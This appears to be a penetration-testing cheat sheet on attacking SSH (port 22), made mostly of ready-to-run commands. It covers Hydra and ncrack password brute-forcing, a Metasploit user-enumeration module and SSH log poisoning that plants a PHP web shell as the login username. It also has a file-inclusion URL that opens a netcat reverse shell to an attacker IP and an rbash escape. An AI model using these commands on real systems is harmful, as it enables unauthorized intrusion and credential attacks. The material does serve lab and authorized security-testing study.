㊙️ r3dcl1ff🔬 EnumerationSSH 22 SSH Enumeration and assorted commands
#Checklist
Copy Check for SSH version vulns
Check for User enum
Check if host key was seen somewhere else
Check if it prompts for a password - means password login is allowed for some users
nmap -sV --script=ssh-hostkey -p22 10.10.10.10
Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar, #Sysadmin shit
check ssh status >>>> sudo service ssh status
Start ssh server >>>> sudo service ssh start
Stop ssh server >>>> sudo service ssh stop
Restart ssh server >>>> sudo service ssh restart
netstat -tulpn | grep sshd >>>> (check is ssh is running and in which ports)
#If you find private keys:
Copy sudo chmod 600 keys (not 777)
ssh -i key target@10.10.10.10 22 #Generate private keys
#Banner Grabbing
Copy nc -vn 192.168.101.158 22 #NMAP SSH scripts
Copy ls -lh /usr/share/nmap/scripts/ssh
sudo nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey # hostkey script #ssh-keyscan
Copy ssh-keyscan -t rsa -p 22 192.168.101.158 # Hydra bruteforcing
Copy sudo hydra -l admin -P rockyou.txt -v 192.168.101.133 ssh -s 22 -t 4 Good password list:
Copy /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt #NCRACK
Push comes to shove use ncrack to bruteforce:
Copy ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24 #Metasploit scanner
Metasploit Enumerating users (useful to enumerate target for future cracking)
Copy use auxiliary/ssh/ssh_enumusers
set rhost 10.10.10.10
set rport 22
set threads 1
set threshold 5
run #SSH Log poisoning
Presupposes both an open ssh port and an RCE vuln
1)kali
ssh ''@10.10.10.10 (target IP)
2)Target URL
http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=ls -la
#Revshell
http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=nc -e /bin/bash 192.168.101.95 1234
#Escaping Rbash
Copy sudo ssh user@192.168.101.173 -t "bash --noprofile" #RCE via SSH
Try to ssh into the box with PHP code as username
Copy ssh <?php system($_GET["cmd"]);?>@10.10.10.10
#Then include the SSH log files inside the web application
#Vulnerable Versions: 7.2p1 | append command and get execution
Copy ssh -v user@10.10.1.111 id
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
#Force Auth method
Copy ssh -v 10.10.1.111 -o PreferredAuthentications=password #Linux with OpenSSH < 7.7
Copy #Usage --> python ssh-username-enum.py 10.10.10.10 -w usernames.txt
